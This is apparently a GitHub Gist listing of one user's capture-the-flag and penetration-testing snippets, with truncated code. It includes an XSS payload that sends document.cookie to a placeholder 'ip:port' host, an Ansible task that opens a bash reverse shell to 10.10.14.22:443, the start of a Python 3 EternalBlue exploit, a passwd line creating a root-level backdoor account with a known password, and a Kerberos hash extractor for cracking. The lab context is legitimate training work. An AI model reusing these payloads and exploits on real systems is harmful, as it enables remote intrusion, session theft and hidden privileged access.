Reelix
/ find-kerb.py
Last active
April 10, 2024 14:17
Find a kerberos handshake hash in a .pcap file in hashcat format
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import socket | |
| import pyshark | |
| from pprint import pprint | |
| data = pyshark.FileCapture("C:/Reelix/HTB/Office/Latest-System-Dump-8fbc124d.pcap", display_filter="kerberos") | |
| print("Searching for Kerberos packets...") | |
| for pkt in data: | |
| if "Kerberos" in pkt: | |
| dirs = dir(pkt["Kerberos"]) | |
| if ("cnamestring" in dirs) and ("cipher" in dirs) and ("etype" in dirs) and ("realm" in dirs): |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Test For Image | |
| <img src='http://ip:port/xss' /> | |
| // Test For Fetch | |
| <img src=x onerror=fetch('http://ip:port/xss2' /> | |
| // Fetch Cookie Stealing | |
| <img src=x onerror=fetch('http://ip:port/cookie?cookie='+document.cookie) /> // TODO: b64 encode cookie | |
| // TODO: Fetch entire page contents |
Reelix
/ ConsoleApp.cs
Created
February 20, 2024 15:28
A template file for console-based CTF challenges that require interaction with a server in C#.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.Net; | |
| using System.Net.Sockets; | |
| using System.Text; | |
| namespace ConsoleApp1 | |
| { | |
| internal class Program | |
| { | |
| static void Main(string[] args) | |
| { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # python3 -m pip install pycryptodome==3.4.3 | |
| from Crypto.Util.number import inverse, long_to_bytes | |
| import decimal, binascii | |
| # If you have the id_rsa.pub or equivalent | |
| # ssh-keygen -f id_rsa.pub -e -m PKCS8 > id_rsa.pem | |
| # If you have a private key (pem) file | |
| # - http://certificate.fyicenter.com/2145_FYIcenter_Public_Private_Key_Decoder_and_Viewer.html | |
| # -- Fill in n, e, d, p, q (Note: numeric values of n,d,p,q - Not displayed hex values) |
Reelix
/ 42031-eternal-blue.py
Last active
July 13, 2023 12:59
A fixed python3 version of 42031 (Eternal Blue) with usage steps
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| from impacket import smb | |
| from struct import pack | |
| import sys | |
| import socket | |
| ''' | |
| EternalBlue exploit for Windows 7/2008 by sleepya | |
| The exploit might FAIL and CRASH a target system (depended on what is overwritten) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| - hosts: localhost | |
| tasks: | |
| - name: rev | |
| shell: bash -c 'bash -i >& /dev/tcp/10.10.14.22/443 0>&1' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <script>alert('Reelix');</script> |
Reelix
/ mqtt_multiclient.py
Created
March 10, 2023 10:44
A MQTT client that connects using MQTTv31, MQTTv311, MQTTv5 simultaneously and subscribes to every topic.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # https://shamsher-khan.medium.com/broker-tryhackme-writeup-93202a3f778 | |
| # https://pypi.org/project/paho-mqtt/#client | |
| import paho.mqtt.client as mqtt | |
| import threading | |
| import sys | |
| import ipaddress | |
| IP = "" | |
| try: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| reelix:$1$Nq8UgW36$58WHg7G1iMta.ckiAUXVg0:0:0:root:/root:/bin/bash | |
| Pass: reelix |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1.) sudo nano /etc/iptables/rules.v4 | |
| 2.) sudo su | |
| 3.) iptables-restore < /etc/iptables/rules.v4 | |
| 4.) exit # su | |
| 5.) sudo iptables -L INPUT # Verify your rule is there - Might have a name instea of the port | |
| 6.) Sign into https://cloud.oracle.com/ | |
| 7.) Search for "security lists" and click the link on the left |
NewerOlder